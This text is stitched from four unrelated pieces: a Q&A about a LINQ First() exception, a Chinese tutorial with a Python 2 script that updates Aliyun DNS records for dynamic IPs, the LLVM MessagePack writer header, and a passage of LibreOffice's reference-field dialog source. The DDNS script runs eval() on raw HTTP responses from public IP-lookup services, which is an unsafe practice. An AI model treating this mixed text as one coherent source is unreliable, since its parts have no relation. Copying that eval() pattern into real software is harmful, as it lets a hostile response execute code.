Md Hohn Md Hohn - 1 year ago 64 C# Question How to convert Sql Datetime query into Linq select * from Employees where DataofJoin ='2005-01-01 00:00:00.000' I wrote this Linq Query as public JsonResult Dif() { var ss = Convert.ToDateTime("2001-01-01 00:00:00.000"); var x = (from n in db.Employees where n.DataofBirth == ss select n).First(); return new JsonResult { JsonRequestBehavior = JsonRequestBehavior.AllowGet }; } But its throwing the following error: "An exception of type 'System.InvalidOperationException' occurred in System.Core.dll but was not handled in user code" Answer Source As I can Understand , This issue is because of attempt to get an item from empty object. Because you are making a call of .First() and there is an empty result returned by the query. So if you do obj.First() of an empty object it throws exception. Use obj.FirstOrDefault() To avoid the exception. And if Linq is not returning the data is an issue then use Sql Profiler to check what query is been called,or change the date filter accordingly. To avoid error Use - var x = (from n in db.Employees where n.DataofBirth == ss select n).FirstOrDefault(); Update For getting proper date, do something like this . var ss = new DateTime (2005,01,01,0,0,0); //use this date in linq query Hope it will help you. Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download
__label__pos
0.714166
0x01 前言 我本来是使用DNSPod的DDNS服务,但自从我撤走极路由后就再也用不了了。同时DNSPod免费用户最低的TTL仅能设为600(10分钟),不足以满足DDNS的需求。我试过很多次重启服务器或者重新拨号后都无法在短时间内更新DNS的A记录。 其实DNSPod也有简单易用的API可供我编写python脚本,相对于阿里云年付的40.8元,DNSPod的年付360确实有点贵,同时DNSPod个人专业版的TTL最低也就300(5分钟),但阿里云最低却能设为1(1秒)。 如果你需要阿里云的付费服务,以下是一个9折优惠码: 阿里云9折优惠码:nfasn1 DNSPod DNS费用详情 DNSPod DNS费用详情 阿里云DNS费用详情 阿里云DNS费用详情 0x02 准备 因为受限于阿里云python SDK,这里使用python2.7进行编写。运行时请使用python2.x版本运行,而使用python3.x将会出现错误。 首先要在系统上安装阿里云的python SDK: #新安装的系统没有python pip,所以先安装它和其他依赖包 [[email protected] ~]# yum install python-pip gcc gcc-devel autoconf automake python-devel python-pip python-crypto python-cryptography -y #安装alidns python DSK [[email protected] ~]# pip install aliyun-python-sdk-alidns 还需要准备以下账号内容: 1. Access Key ID 2. Access Key Secret 3. 账号ID 准备好上面的内容后,将你的域名添加到阿里云解析DNS中: WechatIMG23 完成后再在这个域名下添加一个主机A记录: WechatIMG24 至此,准备工作已经完成。下面来获取域名的关键信息。 0x03 关键信息 通过脚本更新DNS记录需要几个关键的信息,如下: 1. 一级域名(你的域名) 2. 主机记录(你的二级域名) 3. 记录类型(你的本地IP地址) 4. 记录ID(这个解析记录的ID) 5. 记录TTL(记录有效生存时间) 0x03.1 记录ID 其中1,2,3,5是可以确定的,而4则需要通过阿里云API获取: def check_records(dns_domain): clt = client.AcsClient(access_key_id, access_Key_secret, 'cn-hangzhou') request = DescribeDomainRecordsRequest.DescribeDomainRecordsRequest() request.set_DomainName(dns_domain) request.set_accept_format(rc_format) result = clt.do_action_with_exception(request) result = result.decode() result_dict = json.JSONDecoder().decode(result) result_list = result_dict['DomainRecords']['Record'] for j in result_list: print('Subdomain:' + j['RR'].encode() + ' ' + '| RecordId:' + j['RecordId'].encode()) return 返还的内容如下: [[email protected] aliyun_ddns]# python aliyun_ddns.py Subdomain:subdomain_1 | RecordId:3331111111111111 Subdomain:subdomain_2 | RecordId:3331111111111111 Subdomain:subdomain_3 | RecordId:3331111111111111 Subdomain:subdomain_4 | RecordId:3331111111111111 Subdomain:subdomain_5 | RecordId:3331111111111111 Subdomain:subdomain_6 | RecordId:3331111111111111 0x03.2 本机IP 而获取本机IP,我选用ip.cn这个网站。当使用curl访问这个网站时,它会返还IP归属地和IP地址。使用脚本获取: WechatIMG25 def my_ip_method_1(): get_ip_method = os.popen('curl -s ip.cn') get_ip_responses = get_ip_method.readlines()[0] get_ip_pattern = re.compile(r'\d+\.\d+\.\d+\.\d+') get_ip_value = get_ip_pattern.findall(get_ip_responses)[0] return get_ip_value 可能因为ip.cn这个站点受到攻击,他们的服务目前不太稳定,请使用my_ip_method_2或my_ip_method_3这两种本地IP的获取方式。 0x04 对比 | 更新 怎样才能知道IP地址是否有改变? 在获取本地IP后,再通过阿里云DNS API获取上一次的记录,两者相对比,如果不一致则更新DNS记录。 0x04.1 上一次的记录 def old_ip(): clt = client.AcsClient(access_key_id, access_Key_secret, 'cn-hangzhou') request = DescribeDomainRecordInfoRequest.DescribeDomainRecordInfoRequest() request.set_RecordId(rc_record_id) request.set_accept_format(rc_format) result = clt.do_action(request) result = json.JSONDecoder().decode(result) result = result['Value'] return result 0x04.2 更新记录 def update_dns(dns_rr, dns_type, dns_value, dns_record_id, dns_ttl, dns_format): clt = client.AcsClient(access_key_id, access_Key_secret, 'cn-hangzhou') request = UpdateDomainRecordRequest.UpdateDomainRecordRequest() request.set_RR(dns_rr) request.set_Type(dns_type) request.set_Value(dns_value) request.set_RecordId(dns_record_id) request.set_TTL(dns_ttl) request.set_accept_format(dns_format) result = clt.do_action(request) return result 0x04.3 对比 if rc_value_old == rc_value: print 'The specified value of parameter Value is the same as old' else: update_dns(rc_rr, rc_type, rc_value, rc_record_id, rc_ttl, rc_format) 0x05 记录 我不但想要更新DDNS记录,我还想记录下每一次重新拨号后获取的IP,说不定日后能做个分析什么的。那么将记录写入文件: def write_to_file(): time_now = datetime.now().strftime('%Y-%m-%d %H:%M:%S') current_script_path = sys.path[7] print current_script_path log_file = current_script_path + '/' + 'aliyun_ddns_log.txt' write = open(log_file, 'a') write.write(time_now + ' ' + str(rc_value) + '\n') write.close() return 0x06 完整脚本 最新完整脚本请移步至GitHub:阿里云DDNS python脚本 # -*- coding: UTF-8 -*- import json import os import re import sys from datetime import datetime import requests from aliyunsdkalidns.request.v20150109 import UpdateDomainRecordRequest, DescribeDomainRecordsRequest, \ DescribeDomainRecordInfoRequest from aliyunsdkcore import client access_key_id = "" access_Key_secret = "" # 请填写你的账号ID account_id = "" # 如果填写yes,则运行程序后仅显示域名信息,并不会更新记录,用于获取解析记录ID。 # 如果填写no,则运行程序后不显示域名信息,仅更新记录。 i_dont_know_record_id = 'yes' # 请填写你的一级域名 rc_domain = '' # 请填写你的解析记录 rc_rr = '' # 请填写你的记录类型,DDNS请填写A,表示A记录 rc_type = 'A' # 请填写解析记录ID rc_record_id = '' # 请填写解析有效生存时间TTL,单位:秒 rc_ttl = '30' # 请填写返还内容格式,json,xml rc_format = 'json' def my_ip_method_1(): get_ip_method = os.popen('curl -s ip.cn') get_ip_responses = get_ip_method.readlines()[0] get_ip_pattern = re.compile(r'\d+\.\d+\.\d+\.\d+') get_ip_value = get_ip_pattern.findall(get_ip_responses)[0] return get_ip_value def my_ip_method_2(): get_ip_method = os.popen('curl -s http://ip-api.com/json') get_ip_responses = get_ip_method.readlines()[0] get_ip_responses = eval(str(get_ip_responses)) get_ip_value = get_ip_responses['query'] return get_ip_value def my_ip_method_3(): get_ip_method = requests.get('http://ifconfig.co/json').content get_ip_value = eval(get_ip_method) get_ip_value = get_ip_value['ip'] return get_ip_value def check_records(dns_domain): clt = client.AcsClient(access_key_id, access_Key_secret, 'cn-hangzhou') request = DescribeDomainRecordsRequest.DescribeDomainRecordsRequest() request.set_DomainName(dns_domain) request.set_accept_format(rc_format) result = clt.do_action_with_exception(request) result = result.decode() result_dict = json.JSONDecoder().decode(result) result_list = result_dict['DomainRecords']['Record'] for j in result_list: print('Subdomain:' + j['RR'].encode() + ' ' + '| RecordId:' + j['RecordId'].encode()) return def old_ip(): clt = client.AcsClient(access_key_id, access_Key_secret, 'cn-hangzhou') request = DescribeDomainRecordInfoRequest.DescribeDomainRecordInfoRequest() request.set_RecordId(rc_record_id) request.set_accept_format(rc_format) result = clt.do_action_with_exception(request).decode() result = json.JSONDecoder().decode(result) result = result['Value'] return result def update_dns(dns_rr, dns_type, dns_value, dns_record_id, dns_ttl, dns_format): clt = client.AcsClient(access_key_id, access_Key_secret, 'cn-hangzhou') request = UpdateDomainRecordRequest.UpdateDomainRecordRequest() request.set_RR(dns_rr) request.set_Type(dns_type) request.set_Value(dns_value) request.set_RecordId(dns_record_id) request.set_TTL(dns_ttl) request.set_accept_format(dns_format) result = clt.do_action_with_exception(request) return result def write_to_file(): time_now = datetime.now().strftime('%Y-%m-%d %H:%M:%S') current_script_path = sys.path[1] log_file = current_script_path + '/' + 'aliyun_ddns_log.txt' write = open(log_file, 'a') write.write(time_now + ' ' + str(rc_value) + '\n') write.close() return if i_dont_know_record_id == 'yes': check_records(rc_domain) elif i_dont_know_record_id == 'no': rc_value = my_ip_method_3() rc_value_old = old_ip() if rc_value_old == rc_value: print('The specified value of parameter Value is the same as old') else: print(update_dns(rc_rr, rc_type, rc_value, rc_record_id, rc_ttl, rc_format)) write_to_file() 可能因为ip.cn这个站点收到攻击,他们的服务目前不太稳定,请使用my_ip_method_2或my_ip_method_3这两种本地IP的获取方式。 修改第117行即可修改本地IP的获取方式。 0x07 运行 将程序通过crontab每分钟运行一次,请将脚本路径修改为你的实际路径: */1 * * * * root /usr/bin/python2.7 /usr/local/shell/aliyun_ddns.py > /dev/null 1>/dev/null 0x08 结语 其实这个脚本也可以更新其他类型的DNS记录,例如:CNAME,TXT等,只要知道解析记录ID即可。 经过近3天的运行,一切正常。
__label__pos
0.968458
1//===- MsgPackWriter.h - Simple MsgPack writer ------------------*- C++ -*-===// 2// 3// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. 4// See https://llvm.org/LICENSE.txt for license information. 5// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception 6// 7//===----------------------------------------------------------------------===// 8/// 9/// \file 10/// This file contains a MessagePack writer. 11/// 12/// See https://github.com/msgpack/msgpack/blob/master/spec.md for the full 13/// specification. 14/// 15/// Typical usage: 16/// \code 17/// raw_ostream output = GetOutputStream(); 18/// msgpack::Writer MPWriter(output); 19/// MPWriter.writeNil(); 20/// MPWriter.write(false); 21/// MPWriter.write("string"); 22/// // ... 23/// \endcode 24/// 25/// 26//===----------------------------------------------------------------------===// 27 28#ifndef LLVM_BINARYFORMAT_MSGPACKWRITER_H 29#define LLVM_BINARYFORMAT_MSGPACKWRITER_H 30 31#include "llvm/BinaryFormat/MsgPack.h" 32#include "llvm/Support/EndianStream.h" 33#include "llvm/Support/MemoryBuffer.h" 34#include "llvm/Support/raw_ostream.h" 35 36namespace llvm { 37namespace msgpack { 38 39/// Writes MessagePack objects to an output stream, one at a time. 40class Writer { 41public: 42 /// Construct a writer, optionally enabling "Compatibility Mode" as defined 43 /// in the MessagePack specification. 44 /// 45 /// When in \p Compatible mode, the writer will write \c Str16 formats 46 /// instead of \c Str8 formats, and will refuse to write any \c Bin formats. 47 /// 48 /// \param OS stream to output MessagePack objects to. 49 /// \param Compatible when set, write in "Compatibility Mode". 50 Writer(raw_ostream &OS, bool Compatible = false); 51 52 Writer(const Writer &) = delete; 53 Writer &operator=(const Writer &) = delete; 54 55 /// Write a \em Nil to the output stream. 56 /// 57 /// The output will be the \em nil format. 58 void writeNil(); 59 60 /// Write a \em Boolean to the output stream. 61 /// 62 /// The output will be a \em bool format. 63 void write(bool b); 64 65 /// Write a signed integer to the output stream. 66 /// 67 /// The output will be in the smallest possible \em int format. 68 /// 69 /// The format chosen may be for an unsigned integer. 70 void write(int64_t i); 71 72 /// Write an unsigned integer to the output stream. 73 /// 74 /// The output will be in the smallest possible \em int format. 75 void write(uint64_t u); 76 77 /// Write a floating point number to the output stream. 78 /// 79 /// The output will be in the smallest possible \em float format. 80 void write(double d); 81 82 /// Write a string to the output stream. 83 /// 84 /// The output will be in the smallest possible \em str format. 85 void write(StringRef s); 86 87 /// Write a memory buffer to the output stream. 88 /// 89 /// The output will be in the smallest possible \em bin format. 90 /// 91 /// \warning Do not use this overload if in \c Compatible mode. 92 void write(MemoryBufferRef Buffer); 93 94 /// Write the header for an \em Array of the given size. 95 /// 96 /// The output will be in the smallest possible \em array format. 97 // 98 /// The header contains an identifier for the \em array format used, as well 99 /// as an encoding of the size of the array. 100 /// 101 /// N.B. The caller must subsequently call \c Write an additional \p Size 102 /// times to complete the array. 103 void writeArraySize(uint32_t Size); 104 105 /// Write the header for a \em Map of the given size. 106 /// 107 /// The output will be in the smallest possible \em map format. 108 // 109 /// The header contains an identifier for the \em map format used, as well 110 /// as an encoding of the size of the map. 111 /// 112 /// N.B. The caller must subsequently call \c Write and additional \c Size*2 113 /// times to complete the map. Each even numbered call to \c Write defines a 114 /// new key, and each odd numbered call defines the previous key's value. 115 void writeMapSize(uint32_t Size); 116 117 /// Write a typed memory buffer (an extension type) to the output stream. 118 /// 119 /// The output will be in the smallest possible \em ext format. 120 void writeExt(int8_t Type, MemoryBufferRef Buffer); 121 122private: 123 support::endian::Writer EW; 124 bool Compatible; 125}; 126 127} // end namespace msgpack 128} // end namespace llvm 129 130#endif // LLVM_BINARYFORMAT_MSGPACKWRITER_H 131
__label__pos
0.937465
LibreOffice Module sw (master)  1 fldref.cxx Go to the documentation of this file. 1 /* -*- Mode: C++; tab-width: 4; indent-tabs-mode: nil; c-basic-offset: 4 -*- */ 2 /* 3  * This file is part of the LibreOffice project. 4  * 5  * This Source Code Form is subject to the terms of the Mozilla Public 6  * License, v. 2.0. If a copy of the MPL was not distributed with this 7  * file, You can obtain one at http://mozilla.org/MPL/2.0/. 8  * 9  * This file incorporates work covered by the following license notice: 10  * 11  * Licensed to the Apache Software Foundation (ASF) under one or more 12  * contributor license agreements. See the NOTICE file distributed 13  * with this work for additional information regarding copyright 14  * ownership. The ASF licenses this file to you under the Apache 15  * License, Version 2.0 (the "License"); you may not use this file 16  * except in compliance with the License. You may obtain a copy of 17  * the License at http://www.apache.org/licenses/LICENSE-2.0 . 18  */ 19  20 #include <swtypes.hxx> 21 #include <view.hxx> 22 #include <IMark.hxx> 23 #include <expfld.hxx> 24 #include <swmodule.hxx> 25 #include "fldref.hxx" 26 #include <reffld.hxx> 27 #include <wrtsh.hxx> 28  29 #include <fldref.hrc> 30 #include <globals.hrc> 31 #include <strings.hrc> 32 #include <SwNodeNum.hxx> 33 #include <IDocumentMarkAccess.hxx> 34 #include <ndtxt.hxx> 35 #include <unotools/configmgr.hxx> 37 #include <unotools/charclass.hxx> 38  39 #include <comphelper/string.hxx> 40  41 #define REFFLDFLAG 0x4000 42 #define REFFLDFLAG_BOOKMARK 0x4800 43 #define REFFLDFLAG_FOOTNOTE 0x5000 44 #define REFFLDFLAG_ENDNOTE 0x6000 45 // #i83479# 46 #define REFFLDFLAG_HEADING 0x7100 47 #define REFFLDFLAG_NUMITEM 0x7200 48  49 static sal_uInt16 nFieldDlgFormatSel = 0; 50  51 #define USER_DATA_VERSION_1 "1" 52 #define USER_DATA_VERSION USER_DATA_VERSION_1 53  55  : SwFieldPage(pPage, pController, "modules/swriter/ui/fldrefpage.ui", "FieldRefPage", pCoreSet) 56  , maOutlineNodes() 57  , maNumItems() 58  , mpSavedSelectedTextNode(nullptr) 59  , mnSavedSelectedPos(0) 60  , m_xTypeLB(m_xBuilder->weld_tree_view("type")) 61  , m_xSelection(m_xBuilder->weld_widget("selectframe")) 62  , m_xSelectionLB(m_xBuilder->weld_tree_view("select")) 63  , m_xSelectionToolTipLB(m_xBuilder->weld_tree_view("selecttip")) 64  , m_xFormat(m_xBuilder->weld_widget("formatframe")) 65  , m_xFormatLB(m_xBuilder->weld_tree_view("format")) 66  , m_xNameFT(m_xBuilder->weld_label("nameft")) 67  , m_xNameED(m_xBuilder->weld_entry("name")) 68  , m_xValueED(m_xBuilder->weld_entry("value")) 69  , m_xFilterED(m_xBuilder->weld_entry("filter")) 70 { 71  m_xSelectionLB->make_sorted(); 72  // #i83479# 73  for (size_t i = 0; i < SAL_N_ELEMENTS(FLD_REF_PAGE_TYPES); ++i) 74  { 75  m_xTypeLB->append_text(SwResId(FLD_REF_PAGE_TYPES[i])); 76  m_xFormatLB->append_text(SwResId(FLD_REF_PAGE_TYPES[i])); 77  } 78  79  sBookmarkText = m_xTypeLB->get_text(0); 80  sFootnoteText = m_xTypeLB->get_text(1); 81  sEndnoteText = m_xTypeLB->get_text(2); 82  // #i83479# 83  sHeadingText = m_xTypeLB->get_text(3); 84  sNumItemText = m_xTypeLB->get_text(4); 85  86  auto nHeight = m_xTypeLB->get_height_rows(8); 87  auto nWidth = m_xTypeLB->get_approximate_digit_width() * FIELD_COLUMN_WIDTH; 88  m_xTypeLB->set_size_request(nWidth, nHeight); 89  m_xFormatLB->set_size_request(nWidth, nHeight); 90  m_xSelection->set_size_request(nWidth * 2, nHeight); 91  nHeight = m_xTypeLB->get_height_rows(20); 92  m_xSelectionToolTipLB->set_size_request(nHeight, nWidth*2); 93  94  m_xTypeLB->clear(); 95  96  m_xNameED->connect_changed(LINK(this, SwFieldRefPage, ModifyHdl)); 97  m_xFilterED->connect_changed( LINK( this, SwFieldRefPage, ModifyHdl_Impl ) ); 98  99  m_xTypeLB->connect_row_activated(LINK(this, SwFieldRefPage, TreeViewInsertHdl)); 100  m_xTypeLB->connect_changed(LINK(this, SwFieldRefPage, TypeHdl)); 101  m_xSelectionLB->connect_changed(LINK(this, SwFieldRefPage, SubTypeListBoxHdl)); 102  m_xSelectionLB->connect_row_activated(LINK(this, SwFieldRefPage, TreeViewInsertHdl)); 103  m_xFormatLB->connect_row_activated(LINK(this, SwFieldRefPage, TreeViewInsertHdl)); 104  105  // #i83479# 106  m_xSelectionToolTipLB->connect_changed( LINK(this, SwFieldRefPage, SubTypeTreeListBoxHdl) ); 107  m_xSelectionToolTipLB->connect_row_activated( LINK(this, SwFieldRefPage, TreeViewInsertHdl) ); 108  m_xFilterED->grab_focus(); 109 } 110  112 { 113 } 114  116 { 117  UpdateSubType(comphelper::string::strip(m_xFilterED->get_text(), ' ')); 118 } 119  120 // #i83479# 122 { 123  mpSavedSelectedTextNode = nullptr; 124  mnSavedSelectedPos = 0; 125  if ( m_xSelectionToolTipLB->get_visible() ) 126  { 127  int nEntry = m_xSelectionToolTipLB->get_selected_index(); 128  if (nEntry != -1) 129  { 130  const sal_uInt16 nTypeId = m_xTypeLB->get_id(GetTypeSel()).toUInt32(); 131  132  if ( nTypeId == REFFLDFLAG_HEADING ) 133  { 134  mnSavedSelectedPos = m_xSelectionToolTipLB->get_id(nEntry).toUInt32(); 135  if ( mnSavedSelectedPos < maOutlineNodes.size() ) 136  { 138  } 139  } 140  else if ( nTypeId == REFFLDFLAG_NUMITEM ) 141  { 142  mnSavedSelectedPos = m_xSelectionToolTipLB->get_id(nEntry).toUInt32(); 143  if ( mnSavedSelectedPos < maNumItems.size() ) 144  { 146  } 147  } 148  } 149  } 150 } 151  153 { 154  if (!IsFieldEdit()) 155  { 156  SavePos(*m_xTypeLB); 157  // #i83479# 159  } 160  SetSelectionSel(-1); 161  SetTypeSel(-1); 162  Init(); // general initialisation 163  164  // initialise TypeListBox 165  m_xTypeLB->freeze(); 166  m_xTypeLB->clear(); 167  168  // fill Type-Listbox 169  170  // set/insert reference 172  173  for (short i = rRg.nStart; i < rRg.nEnd; ++i) 174  { 175  const SwFieldTypesEnum nTypeId = SwFieldMgr::GetTypeId(i); 176  177  if (!IsFieldEdit() || nTypeId != SwFieldTypesEnum::SetRef) 178  { 179  m_xTypeLB->append(OUString::number(static_cast<sal_uInt16>(nTypeId)), SwFieldMgr::GetTypeStr(i)); 180  } 181  } 182  183  // #i83479# 184  // entries for headings and numbered items 185  m_xTypeLB->append(OUString::number(REFFLDFLAG_HEADING), sHeadingText); 186  m_xTypeLB->append(OUString::number(REFFLDFLAG_NUMITEM), sNumItemText); 187  188  // fill up with the sequence types 189  SwWrtShell *pSh = GetWrtShell(); 190  if (!pSh) 191  pSh = ::GetActiveWrtShell(); 192  193  if (!pSh) 194  return; 195  196  const size_t nFieldTypeCnt = pSh->GetFieldTypeCount(SwFieldIds::SetExp); 197  198  OSL_ENSURE( nFieldTypeCnt < static_cast<size_t>(REFFLDFLAG), "<SwFieldRefPage::Reset> - Item index will overlap flags!" ); 199  200  for (size_t n = 0; n < nFieldTypeCnt; ++n) 201  { 203  204  if ((nsSwGetSetExpType::GSE_SEQ & pType->GetType()) && pType->HasWriterListeners() && pSh->IsUsed(*pType)) 205  { 206  m_xTypeLB->append(OUString::number(REFFLDFLAG | n), pType->GetName()); 207  } 208  } 209  210  // text marks - now always (because of globaldocuments) 211  m_xTypeLB->append(OUString::number(REFFLDFLAG_BOOKMARK), sBookmarkText); 212  213  // footnotes: 214  if( pSh->HasFootnotes() ) 215  { 216  m_xTypeLB->append(OUString::number(REFFLDFLAG_FOOTNOTE), sFootnoteText); 217  } 218  219  // endnotes: 220  if ( pSh->HasFootnotes(true) ) 221  { 222  m_xTypeLB->append(OUString::number(REFFLDFLAG_ENDNOTE), sEndnoteText); 223  } 224  225  m_xTypeLB->thaw(); 226  227  // select old Pos 228  if (!IsFieldEdit()) 230  231  nFieldDlgFormatSel = 0; 232  233  sal_uInt16 nFormatBoxPosition = USHRT_MAX; 234  if( !IsRefresh() ) 235  { 236  sal_Int32 nIdx{ 0 }; 237  const OUString sUserData = GetUserData(); 238  if(!IsRefresh() && sUserData.getToken(0, ';', nIdx). 239  equalsIgnoreAsciiCase(USER_DATA_VERSION_1)) 240  { 241  const sal_uInt16 nVal = static_cast< sal_uInt16 >(sUserData.getToken(0, ';', nIdx).toInt32()); 242  if(nVal != USHRT_MAX) 243  { 244  for(sal_Int32 i = 0, nEntryCount = m_xTypeLB->n_children(); i < nEntryCount; ++i) 245  { 246  if (nVal == m_xTypeLB->get_id(i).toUInt32()) 247  { 248  m_xTypeLB->select(i); 249  break; 250  } 251  } 252  if (nIdx>=0 && nIdx<sUserData.getLength()) 253  { 254  nFormatBoxPosition = static_cast< sal_uInt16 >(sUserData.getToken(0, ';', nIdx).toInt32()); 255  } 256  } 257  } 258  } 259  TypeHdl(*m_xTypeLB); 260  if (nFormatBoxPosition < m_xFormatLB->n_children()) 261  { 262  m_xFormatLB->select(nFormatBoxPosition); 263  } 264  if (IsFieldEdit()) 265  { 266  m_xTypeLB->save_value(); 267  m_xSelectionLB->save_value(); 268  m_xFormatLB->save_value(); 269  m_xNameED->save_value(); 270  m_xValueED->save_value(); 271  m_xFilterED->set_text(OUString()); 272  } 273 } 274  276 { 277  // save old ListBoxPos 278  const sal_Int32 nOld = GetTypeSel(); 279  280  // current ListBoxPos 281  SetTypeSel(m_xTypeLB->get_selected_index()); 282  283  if(GetTypeSel() == -1) 284  { 285  if (IsFieldEdit()) 286  { 287  // select positions 288  OUString sName; 289  sal_uInt16 nFlag = 0; 290  291  switch( GetCurField()->GetSubType() ) 292  { 293  case REF_BOOKMARK: 294  { 295  // #i83479# 296  SwGetRefField* pRefField = dynamic_cast<SwGetRefField*>(GetCurField()); 297  if ( pRefField && 298  pRefField->IsRefToHeadingCrossRefBookmark() ) 299  { 300  sName = sHeadingText; 301  nFlag = REFFLDFLAG_HEADING; 302  } 303  else if ( pRefField && 304  pRefField->IsRefToNumItemCrossRefBookmark() ) 305  { 306  sName = sNumItemText; 307  nFlag = REFFLDFLAG_NUMITEM; 308  } 309  else 310  { 311  sName = sBookmarkText; 312  nFlag = REFFLDFLAG_BOOKMARK; 313  } 314  } 315  break; 316  317  case REF_FOOTNOTE: 318  sName = sFootnoteText; 319  nFlag = REFFLDFLAG_FOOTNOTE; 320  break; 321  322  case REF_ENDNOTE: 323  sName = sEndnoteText; 324  nFlag = REFFLDFLAG_ENDNOTE; 325  break; 326  327  case REF_SETREFATTR: 328  sName = SwResId(STR_GETREFFLD); 329  nFlag = REF_SETREFATTR; 330  break; 331  332  case REF_SEQUENCEFLD: 333  sName = static_cast<SwGetRefField*>(GetCurField())->GetSetRefName(); 334  nFlag = REFFLDFLAG; 335  break; 336  } 337  338  if (m_xTypeLB->find_text(sName) == -1) // reference to deleted mark 339  { 340  m_xTypeLB->append(OUString::number(nFlag), sName); 341  } 342  343  m_xTypeLB->select_text(sName); 344  SetTypeSel(m_xTypeLB->get_selected_index()); 345  } 346  else 347  { 348  SetTypeSel(0); 349  m_xTypeLB->select(0); 350  } 351  } 352  353  if (nOld == GetTypeSel()) 354  return; 355  356  sal_uInt16 nTypeId = m_xTypeLB->get_id(GetTypeSel()).toUInt32(); 357  358  // fill selection-ListBox 359  UpdateSubType(comphelper::string::strip(m_xFilterED->get_text(), ' ')); 360  361  bool bName = false; 362  nFieldDlgFormatSel = 0; 363  364  if ( ( !IsFieldEdit() || m_xSelectionLB->n_children() ) && 365  nOld != -1 ) 366  { 367  m_xNameED->set_text(OUString()); 368  m_xValueED->set_text(OUString()); 369  m_xFilterED->set_text(OUString()); 370  } 371  372  switch (nTypeId) 373  { 374  case static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef): 375  if (nOld != -1 && REFFLDFLAG & m_xTypeLB->get_id(nOld).toUInt32()) 376  // the old one stays 377  nFieldDlgFormatSel = m_xFormatLB->get_selected_index(); 378  bName = true; 379  break; 380  381  case static_cast<sal_uInt16>(SwFieldTypesEnum::SetRef): 382  bName = true; 383  break; 384  385  case REFFLDFLAG_BOOKMARK: 386  bName = true; 387  [[fallthrough]]; 388  default: 389  if( REFFLDFLAG & nTypeId ) 390  { 391  const sal_uInt16 nOldId = nOld != -1 ? m_xTypeLB->get_id(nOld).toUInt32() : 0; 392  if( nOldId & REFFLDFLAG || nOldId == static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef) ) 393  // then the old one stays 394  nFieldDlgFormatSel = m_xFormatLB->get_selected_index(); 395  } 396  break; 397  } 398  399  m_xNameED->set_sensitive(bName); 400  m_xNameFT->set_sensitive(bName); 401  402  // fill Format-Listbox 403  sal_Int32 nSize = FillFormatLB(nTypeId); 404  bool bFormat = nSize != 0; 405  m_xFormat->set_sensitive(bFormat); 406  407  SubTypeHdl(); 408  ModifyHdl(*m_xNameED); 409  ModifyHdl(*m_xFilterED); 410 } 411  412 IMPL_LINK_NOARG(SwFieldRefPage, SubTypeTreeListBoxHdl, weld::TreeView&, void) 413 { 414  SubTypeHdl(); 415 } 416  417 IMPL_LINK_NOARG(SwFieldRefPage, SubTypeListBoxHdl, weld::TreeView&, void) 418 { 419  SubTypeHdl(); 420 } 421  423 { 424  sal_uInt16 nTypeId = m_xTypeLB->get_id(GetTypeSel()).toUInt32(); 425  426  switch(nTypeId) 427  { 428  case static_cast<sal_uInt16>(SwFieldTypesEnum::GetRef): 429  if (!IsFieldEdit() || m_xSelectionLB->get_selected_index() != -1) 430  { 431  m_xNameED->set_text(m_xSelectionLB->get_selected_text()); 432  ModifyHdl(*m_xNameED); 433  } 434  break; 435  436  case static_cast<sal_uInt16>(SwFieldTypesEnum::SetRef): 437  { 438  SwWrtShell *pSh = GetWrtShell(); 439  if(!pSh) 440  pSh = ::GetActiveWrtShell(); 441  if(pSh) 442  { 443  m_xValueED->set_text(pSh->GetSelText()); 444  } 445  446  } 447  break; 448  // #i83479# 449  case REFFLDFLAG_HEADING: 450  case REFFLDFLAG_NUMITEM: 451  { 452  int nEntry = m_xSelectionToolTipLB->get_selected_index(); 453  if (nEntry != -1) 454  m_xNameED->set_text(m_xSelectionToolTipLB->get_text(nEntry)); 455  } 456  break; 457  458  default: 459  if (!IsFieldEdit() || m_xSelectionLB->get_selected_index() != -1) 460  m_xNameED->set_text(m_xSelectionLB->get_selected_text()); 461  break; 462  } 463 } 464  465 // renew types in SelectionLB after filtering 466 void SwFieldRefPage::UpdateSubType(const OUString& filterString) 467 { 468  SwWrtShell *pSh = GetWrtShell(); 469  if(!pSh) 470  pSh = ::GetActiveWrtShell(); 471  SwGetRefField* pRefField = static_cast<SwGetRefField*>(GetCurField()); 472  const sal_uInt16 nTypeId = m_xTypeLB->get_id(GetTypeSel()).toUInt32(); 473  474  OUString sOldSel; 475  // #i83479# 476  if ( m_xSelectionLB->get_visible() ) 477  { 478  const sal_Int32 nSelectionSel = m_xSelectionLB->get_selected_index(); 479  if (nSelectionSel != -1) 480  sOldSel = m_xSelectionLB->get_text(nSelectionSel); 481  } 482  if (IsFieldEdit() && sOldSel.isEmpty()) 483  sOldSel = OUString::number( pRefField->GetSeqNo() + 1 ); 484  485  m_xSelectionLB->freeze(); 486  m_xSelectionLB->clear(); 487  488  if (REFFLDFLAG & nTypeId) 489  { 490  if (nTypeId == REFFLDFLAG_FOOTNOTE || nTypeId == REFFLDFLAG_ENDNOTE) 491  { 492  m_xSelectionLB->thaw(); 493  m_xSelectionLB->make_unsorted(); 494  m_xSelectionLB->freeze(); 495  } 496  // #i83479# 497  else if (nTypeId != REFFLDFLAG_HEADING && nTypeId != REFFLDFLAG_NUMITEM) 498  { 499  m_xSelectionLB->thaw(); 500  m_xSelectionLB->make_sorted(); 501  m_xSelectionLB->freeze(); 502  } 503  } 504  505  // #i83479# 506  m_xSelectionToolTipLB->freeze(); 507  m_xSelectionToolTipLB->clear(); 508  OUString m_sSelectionToolTipLBId; 509  bool bShowSelectionToolTipLB( false ); 510  511  if( REFFLDFLAG & nTypeId ) 512  { 513  if (nTypeId == REFFLDFLAG_BOOKMARK) // text marks! 514  { 515  // get all text marks 516  IDocumentMarkAccess* const pMarkAccess = pSh->getIDocumentMarkAccess(); 517  for(IDocumentMarkAccess::const_iterator_t ppMark = pMarkAccess->getBookmarksBegin(); 518  ppMark != pMarkAccess->getBookmarksEnd(); 519  ++ppMark) 520  { 521  const ::sw::mark::IMark* pBkmk = *ppMark; 523  { 524  bool isSubstring = MatchSubstring(pBkmk->GetName(), filterString); 525  if(isSubstring) 526  { 527  m_xSelectionLB->append_text( pBkmk->GetName() ); 528  } 529  } 530  } 531  if (IsFieldEdit()) 532  sOldSel = pRefField->GetSetRefName(); 533  } 534  else if (nTypeId == REFFLDFLAG_FOOTNOTE) 535  { 537  const size_t nCnt = pSh->GetSeqFootnoteList( aArr ); 